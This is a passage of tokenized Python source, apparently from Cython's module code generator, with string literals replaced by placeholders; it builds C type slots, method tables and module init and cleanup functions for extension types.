] <EOL> for entry in scope . var_entries : <EOL> if entry . type . is_pyobject : <EOL> py_attrs . append ( entry ) <EOL> need_self_cast = type . vtabslot_cname or py_attrs <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> if need_self_cast : <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % scope . parent_type . declaration_code ( "<STR_LIT:p>" ) ) <EOL> if base_type : <EOL> tp_new = TypeSlots . get_base_slot_function ( scope , tp_slot ) <EOL> if tp_new is None : <EOL> tp_new = "<STR_LIT>" % base_type . typeptr_cname <EOL> code . putln ( <EOL> "<STR_LIT>" % tp_new ) <EOL> else : <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if need_self_cast : <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % type . cast_code ( "<STR_LIT:o>" ) ) <EOL> if type . vtabslot_cname : <EOL> vtab_base_type = type <EOL> while vtab_base_type . base_type and vtab_base_type . base_type . vtabstruct_cname : <EOL> vtab_base_type = vtab_base_type . base_type <EOL> if vtab_base_type is not type : <EOL> struct_type_cast = "<STR_LIT>" % vtab_base_type . vtabstruct_cname <EOL> else : <EOL> struct_type_cast = "<STR_LIT>" <EOL> code . putln ( "<STR_LIT>" % ( <EOL> type . vtabslot_cname , <EOL> struct_type_cast , type . vtabptr_cname ) ) <EOL> for entry in py_attrs : <EOL> if entry . name == "<STR_LIT>" : <EOL> code . putln ( "<STR_LIT>" % entry . cname ) <EOL> else : <EOL> code . put_init_var_to_py_none ( entry , "<STR_LIT>" ) <EOL> entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> if entry and entry . is_special : <EOL> if entry . trivial_signature : <EOL> cinit_args = "<STR_LIT>" % Naming . empty_tuple <EOL> else : <EOL> cinit_args = "<STR_LIT>" <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> ( entry . func_cname , cinit_args ) ) <EOL> code . put_decref_clear ( "<STR_LIT:o>" , py_object_type ) ; <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_dealloc_function ( self , scope , code ) : <EOL> tp_slot = TypeSlots . ConstructorSlot ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> slot_func = scope . mangle_internal ( "<STR_LIT>" ) <EOL> base_type = scope . parent_type . base_type <EOL> if tp_slot . slot_code ( scope ) != slot_func : <EOL> return <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> py_attrs = [ ] <EOL> weakref_slot = scope . lookup_here ( "<STR_LIT>" ) <EOL> for entry in scope . var_entries : <EOL> if entry . type . is_pyobject and entry is not weakref_slot : <EOL> py_attrs . append ( entry ) <EOL> if py_attrs or weakref_slot in scope . var_entries : <EOL> self . generate_self_cast ( scope , code ) <EOL> self . generate_usr_dealloc_call ( scope , code ) <EOL> if weakref_slot in scope . var_entries : <EOL> code . putln ( "<STR_LIT>" ) <EOL> for entry in py_attrs : <EOL> code . put_xdecref ( "<STR_LIT>" % entry . cname , entry . type ) <EOL> if base_type : <EOL> tp_dealloc = TypeSlots . get_base_slot_function ( scope , tp_slot ) <EOL> if tp_dealloc is None : <EOL> tp_dealloc = "<STR_LIT>" % base_type . typeptr_cname <EOL> code . putln ( <EOL> "<STR_LIT>" % tp_dealloc ) <EOL> else : <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_usr_dealloc_call ( self , scope , code ) : <EOL> entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> if entry : <EOL> code . putln ( <EOL> "<STR_LIT:{>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> entry . func_cname ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_traverse_function ( self , scope , code ) : <EOL> tp_slot = TypeSlots . GCDependentSlot ( "<STR_LIT>" ) <EOL> slot_func = scope . mangle_internal ( "<STR_LIT>" ) <EOL> base_type = scope . parent_type . base_type <EOL> if tp_slot . slot_code ( scope ) != slot_func : <EOL> return <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % slot_func ) <EOL> py_attrs = [ ] <EOL> for entry in scope . var_entries : <EOL> if entry . type . is_pyobject and entry . name != "<STR_LIT>" : <EOL> py_attrs . append ( entry ) <EOL> if base_type or py_attrs : <EOL> code . putln ( "<STR_LIT>" ) <EOL> if py_attrs : <EOL> self . generate_self_cast ( scope , code ) <EOL> if base_type : <EOL> static_call = TypeSlots . get_base_slot_function ( scope , tp_slot ) <EOL> if static_call : <EOL> code . putln ( "<STR_LIT>" % static_call ) <EOL> else : <EOL> code . putln ( "<STR_LIT>" % base_type . typeptr_cname ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> base_type . typeptr_cname ) <EOL> code . putln ( "<STR_LIT:}>" ) <EOL> for entry in py_attrs : <EOL> var_code = "<STR_LIT>" % entry . cname <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % var_code ) <EOL> if entry . type . is_extension_type : <EOL> var_code = "<STR_LIT>" % var_code <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % var_code ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_clear_function ( self , scope , code ) : <EOL> tp_slot = TypeSlots . GCDependentSlot ( "<STR_LIT>" ) <EOL> slot_func = scope . mangle_internal ( "<STR_LIT>" ) <EOL> base_type = scope . parent_type . base_type <EOL> if tp_slot . slot_code ( scope ) != slot_func : <EOL> return <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % slot_func ) <EOL> py_attrs = [ ] <EOL> for entry in scope . var_entries : <EOL> if entry . type . is_pyobject and entry . name != "<STR_LIT>" : <EOL> py_attrs . append ( entry ) <EOL> if py_attrs : <EOL> self . generate_self_cast ( scope , code ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> if base_type : <EOL> static_call = TypeSlots . get_base_slot_function ( scope , tp_slot ) <EOL> if static_call : <EOL> code . putln ( "<STR_LIT>" % static_call ) <EOL> else : <EOL> code . putln ( "<STR_LIT>" % base_type . typeptr_cname ) <EOL> code . putln ( "<STR_LIT>" % base_type . typeptr_cname ) <EOL> code . putln ( "<STR_LIT:}>" ) <EOL> for entry in py_attrs : <EOL> name = "<STR_LIT>" % entry . cname <EOL> code . putln ( "<STR_LIT>" % name ) <EOL> code . put_init_to_py_none ( name , entry . type ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_getitem_int_function ( self , scope , code ) : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_ass_subscript_function ( self , scope , code ) : <EOL> base_type = scope . parent_type . base_type <EOL> set_entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> del_entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if set_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> set_entry . func_cname ) <EOL> else : <EOL> self . generate_guarded_basetype_call ( <EOL> base_type , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , code ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> '<STR_LIT>' ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if del_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> del_entry . func_cname ) <EOL> else : <EOL> self . generate_guarded_basetype_call ( <EOL> base_type , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , code ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> '<STR_LIT>' ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_guarded_basetype_call ( <EOL> self , base_type , substructure , slot , args , code ) : <EOL> if base_type : <EOL> base_tpname = base_type . typeptr_cname <EOL> if substructure : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> base_tpname , substructure , base_tpname , substructure , slot ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> base_tpname , substructure , slot , args ) ) <EOL> else : <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> base_tpname , slot ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" % ( <EOL> base_tpname , slot , args ) ) <EOL> def generate_ass_slice_function ( self , scope , code ) : <EOL> base_type = scope . parent_type . base_type <EOL> set_entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> del_entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if set_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> set_entry . func_cname ) <EOL> else : <EOL> self . generate_guarded_basetype_call ( <EOL> base_type , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , code ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> '<STR_LIT>' ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if del_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> del_entry . func_cname ) <EOL> else : <EOL> self . generate_guarded_basetype_call ( <EOL> base_type , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , code ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> '<STR_LIT>' ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_getattro_function ( self , scope , code ) : <EOL> def lookup_here_or_base ( n , type = None ) : <EOL> if type is None : <EOL> type = scope . parent_type <EOL> r = type . scope . lookup_here ( n ) <EOL> if r is None and type . base_type is not None : <EOL> return lookup_here_or_base ( n , type . base_type ) <EOL> else : <EOL> return r <EOL> getattr_entry = lookup_here_or_base ( "<STR_LIT>" ) <EOL> getattribute_entry = lookup_here_or_base ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" <EOL> % scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> if getattribute_entry is not None : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> getattribute_entry . func_cname ) <EOL> else : <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if getattr_entry is not None : <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> getattr_entry . func_cname ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_setattro_function ( self , scope , code ) : <EOL> base_type = scope . parent_type . base_type <EOL> set_entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> del_entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if set_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> set_entry . func_cname ) <EOL> else : <EOL> self . generate_guarded_basetype_call ( <EOL> base_type , None , "<STR_LIT>" , "<STR_LIT>" , code ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if del_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> del_entry . func_cname ) <EOL> else : <EOL> self . generate_guarded_basetype_call ( <EOL> base_type , None , "<STR_LIT>" , "<STR_LIT>" , code ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_descr_get_function ( self , scope , code ) : <EOL> user_get_entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> user_get_entry . func_cname ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_descr_set_function ( self , scope , code ) : <EOL> base_type = scope . parent_type . base_type <EOL> user_set_entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> user_del_entry = scope . lookup_here ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> scope . mangle_internal ( "<STR_LIT>" ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if user_set_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> user_set_entry . func_cname ) <EOL> else : <EOL> self . generate_guarded_basetype_call ( <EOL> base_type , None , "<STR_LIT>" , "<STR_LIT>" , code ) <EOL> code . putln ( <EOL> '<STR_LIT>' ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if user_del_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> user_del_entry . func_cname ) <EOL> else : <EOL> self . generate_guarded_basetype_call ( <EOL> base_type , None , "<STR_LIT>" , "<STR_LIT>" , code ) <EOL> code . putln ( <EOL> '<STR_LIT>' ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_property_accessors ( self , cclass_scope , code ) : <EOL> for entry in cclass_scope . property_entries : <EOL> property_scope = entry . scope <EOL> if property_scope . defines_any ( [ "<STR_LIT>" ] ) : <EOL> self . generate_property_get_function ( entry , code ) <EOL> if property_scope . defines_any ( [ "<STR_LIT>" , "<STR_LIT>" ] ) : <EOL> self . generate_property_set_function ( entry , code ) <EOL> def generate_property_get_function ( self , property_entry , code ) : <EOL> property_scope = property_entry . scope <EOL> property_entry . getter_cname = property_scope . parent_scope . mangle ( <EOL> Naming . prop_get_prefix , property_entry . name ) <EOL> get_entry = property_scope . lookup_here ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> property_entry . getter_cname ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> get_entry . func_cname ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_property_set_function ( self , property_entry , code ) : <EOL> property_scope = property_entry . scope <EOL> property_entry . setter_cname = property_scope . parent_scope . mangle ( <EOL> Naming . prop_set_prefix , property_entry . name ) <EOL> set_entry = property_scope . lookup_here ( "<STR_LIT>" ) <EOL> del_entry = property_scope . lookup_here ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> property_entry . setter_cname ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if set_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> set_entry . func_cname ) <EOL> else : <EOL> code . putln ( <EOL> '<STR_LIT>' ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> if del_entry : <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> del_entry . func_cname ) <EOL> else : <EOL> code . putln ( <EOL> '<STR_LIT>' ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> code . putln ( <EOL> "<STR_LIT:}>" ) <EOL> def generate_typeobj_definition ( self , modname , entry , code ) : <EOL> type = entry . type <EOL> scope = type . scope <EOL> for suite in TypeSlots . substructures : <EOL> suite . generate_substructure ( scope , code ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> if entry . visibility == '<STR_LIT>' : <EOL> header = "<STR_LIT>" <EOL> else : <EOL> header = "<STR_LIT>" <EOL> code . putln ( header % type . typeobj_cname ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> '<STR_LIT>' % ( <EOL> self . full_module_name , scope . class_name ) ) <EOL> if type . typedef_flag : <EOL> objstruct = type . objstruct_cname <EOL> else : <EOL> objstruct = "<STR_LIT>" % type . objstruct_cname <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> objstruct ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> for slot in TypeSlots . slot_table : <EOL> slot . generate ( scope , code ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> def generate_method_table ( self , env , code ) : <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> env . method_table_cname ) <EOL> for entry in env . pyfunc_entries : <EOL> code . put_pymethoddef ( entry , "<STR_LIT:U+002C>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> def generate_member_table ( self , env , code ) : <EOL> if env . public_attr_entries : <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> env . member_table_cname ) <EOL> type = env . parent_type <EOL> if type . typedef_flag : <EOL> objstruct = type . objstruct_cname <EOL> else : <EOL> objstruct = "<STR_LIT>" % type . objstruct_cname <EOL> for entry in env . public_attr_entries : <EOL> type_code = entry . type . pymemberdef_typecode <EOL> if entry . visibility == '<STR_LIT>' : <EOL> flags = "<STR_LIT>" <EOL> else : <EOL> flags = "<STR_LIT:0>" <EOL> code . putln ( '<STR_LIT>' % ( <EOL> entry . name , <EOL> type_code , <EOL> "<STR_LIT>" % ( objstruct , entry . cname ) , <EOL> flags ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> def generate_getset_table ( self , env , code ) : <EOL> if env . property_entries : <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" % <EOL> env . getset_table_cname ) <EOL> for entry in env . property_entries : <EOL> code . putln ( <EOL> '<STR_LIT>' % ( <EOL> entry . name , <EOL> entry . getter_cname or "<STR_LIT:0>" , <EOL> entry . setter_cname or "<STR_LIT:0>" , <EOL> entry . doc_cname or "<STR_LIT:0>" ) ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> code . putln ( <EOL> "<STR_LIT>" ) <EOL> def generate_filename_init_prototype ( self , code ) : <EOL> code . putln ( "<STR_LIT>" ) ; <EOL> code . putln ( "<STR_LIT>" % Naming . fileinit_cname ) <EOL> def generate_import_star ( self , env , code ) : <EOL> code . putln ( ) <EOL> code . putln ( "<STR_LIT>" % Naming . import_star ) <EOL> for name , entry in env . entries . items ( ) : <EOL> if entry . is_type : <EOL> code . putln ( '<STR_LIT>' % name ) <EOL> code . putln ( "<STR_LIT:0>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( ) <EOL> code . enter_cfunc_scope ( ) <EOL> code . putln ( "<STR_LIT>" % Naming . import_star_set ) <EOL> code . putln ( "<STR_LIT>" % Naming . import_star ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( '<STR_LIT>' ) <EOL> code . putln ( '<STR_LIT>' ) <EOL> code . putln ( "<STR_LIT:}>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT:}>" ) <EOL> old_error_label = code . new_error_label ( ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> for name , entry in env . entries . items ( ) : <EOL> if entry . is_cglobal and entry . used : <EOL> code . putln ( '<STR_LIT>' % name ) <EOL> if entry . type . is_pyobject : <EOL> if entry . type . is_extension_type or entry . type . is_builtin_type : <EOL> code . putln ( "<STR_LIT>" % ( <EOL> entry . type . type_test_code ( "<STR_LIT:o>" ) , <EOL> code . error_goto ( entry . pos ) ) ) <EOL> code . put_var_decref ( entry ) <EOL> code . putln ( "<STR_LIT>" % ( <EOL> entry . cname , <EOL> PyrexTypes . typecast ( entry . type , py_object_type , "<STR_LIT:o>" ) ) ) <EOL> elif entry . type . from_py_function : <EOL> rhs = "<STR_LIT>" % entry . type . from_py_function <EOL> if entry . type . is_enum : <EOL> rhs = typecast ( entry . type , c_long_type , rhs ) <EOL> code . putln ( "<STR_LIT>" % ( <EOL> entry . cname , <EOL> rhs , <EOL> entry . type . error_condition ( entry . cname ) , <EOL> code . error_goto ( entry . pos ) ) ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> else : <EOL> code . putln ( '<STR_LIT>' % ( name , entry . type ) ) <EOL> code . putln ( code . error_goto ( entry . pos ) ) <EOL> code . putln ( "<STR_LIT:}>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % Naming . module_cname ) <EOL> code . putln ( "<STR_LIT:}>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . put_label ( code . error_label ) <EOL> code . putln ( '<STR_LIT>' % self . full_module_name ) ; <EOL> code . error_label = old_error_label <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT:}>" ) <EOL> code . putln ( import_star_utility_code ) <EOL> code . exit_cfunc_scope ( ) <EOL> def generate_module_init_func ( self , imported_modules , env , code ) : <EOL> code . globalstate . insert_initcode_into ( code ) <EOL> code . enter_cfunc_scope ( ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> header2 = "<STR_LIT>" % env . module_name <EOL> header3 = "<STR_LIT>" % env . module_name <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % header2 ) <EOL> code . putln ( header2 ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % header3 ) <EOL> code . putln ( header3 ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT:{>" ) <EOL> tempdecl_code = code . insertion_point ( ) <EOL> code . putln ( "<STR_LIT>" % ( Naming . empty_tuple , code . error_goto_if_null ( Naming . empty_tuple , self . pos ) ) ) ; <EOL> code . putln ( "<STR_LIT>" ) <EOL> env . generate_library_function_declarations ( code ) <EOL> self . generate_filename_init_call ( code ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( code . error_goto_if_neg ( "<STR_LIT>" , self . pos ) ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> self . generate_module_creation_code ( env , code ) <EOL> if Options . cache_builtins : <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( code . error_goto_if_neg ( "<STR_LIT>" , <EOL> self . pos ) ) <EOL> code . putln ( "<STR_LIT>" % Naming . skip_dispatch_cname ) ; <EOL> code . putln ( "<STR_LIT>" ) <EOL> self . generate_global_init_code ( env , code ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> self . generate_c_function_export_code ( env , code ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> self . generate_type_init_code ( env , code ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> for module in imported_modules : <EOL> self . generate_type_import_code_for_module ( module , env , code ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> for module in imported_modules : <EOL> self . generate_c_function_import_code_for_module ( module , env , code ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . mark_pos ( None ) <EOL> self . body . generate_execution_code ( code ) <EOL> if Options . generate_cleanup_code : <EOL> code . putln ( "<STR_LIT>" % code . error_goto ( self . pos ) ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % env . module_cname ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . put_label ( code . error_label ) <EOL> code . put_var_xdecrefs ( env . temp_entries ) <EOL> code . putln ( '<STR_LIT>' % env . qualified_name ) <EOL> env . use_utility_code ( Nodes . traceback_utility_code ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( '<STR_LIT:}>' ) <EOL> tempdecl_code . put_var_declarations ( env . temp_entries ) <EOL> tempdecl_code . put_temp_declarations ( code . funcstate ) <EOL> code . exit_cfunc_scope ( ) <EOL> def generate_module_cleanup_func ( self , env , code ) : <EOL> if not Options . generate_cleanup_code : <EOL> return <EOL> env . use_utility_code ( import_module_utility_code ) <EOL> env . use_utility_code ( register_cleanup_utility_code ) <EOL> code . globalstate . insert_cleanupcode_into ( code ) <EOL> code . putln ( ) <EOL> code . putln ( '<STR_LIT>' % Naming . cleanup_cname ) <EOL> if Options . generate_cleanup_code >= <NUM_LIT:2> : <EOL> code . putln ( "<STR_LIT>" ) <EOL> rev_entries = list ( env . var_entries ) <EOL> rev_entries . reverse ( ) <EOL> for entry in rev_entries : <EOL> if entry . visibility != '<STR_LIT>' : <EOL> if entry . type . is_pyobject and entry . used : <EOL> code . put_var_decref_clear ( entry ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> if Options . generate_cleanup_code >= <NUM_LIT:3> : <EOL> code . putln ( "<STR_LIT>" ) <EOL> for type , _ in env . types_imported . items ( ) : <EOL> code . put_decref ( "<STR_LIT>" % type . typeptr_cname , PyrexTypes . py_object_type ) <EOL> if Options . cache_builtins : <EOL> code . putln ( "<STR_LIT>" ) <EOL> for entry in env . cached_builtins : <EOL> code . put_var_decref_clear ( entry ) <EOL> code . putln ( "<STR_LIT>" % ( Naming . empty_tuple , Naming . empty_tuple ) ) ; <EOL> code . putln ( "<STR_LIT>" ) <EOL> for entry in env . pynum_entries : <EOL> code . put_var_decref_clear ( entry ) <EOL> if env . all_pystring_entries : <EOL> for entry in env . all_pystring_entries : <EOL> if entry . is_interned : <EOL> code . put_decref_clear ( <EOL> entry . pystring_cname , PyrexTypes . py_object_type ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( '<STR_LIT:}>' ) <EOL> def generate_filename_init_call ( self , code ) : <EOL> code . putln ( "<STR_LIT>" % Naming . fileinit_cname ) <EOL> def generate_pymoduledef_struct ( self , env , code ) : <EOL> if env . doc : <EOL> doc = env . doc_cname <EOL> else : <EOL> doc = "<STR_LIT:0>" <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % Naming . pymoduledef_cname ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( '<STR_LIT>' % env . module_name ) <EOL> code . putln ( "<STR_LIT>" % doc ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % env . method_table_cname ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" ) <EOL> def generate_module_creation_code ( self , env , code ) : <EOL> if env . doc : <EOL> doc = env . doc_cname <EOL> else : <EOL> doc = "<STR_LIT:0>" <EOL> code . putln ( 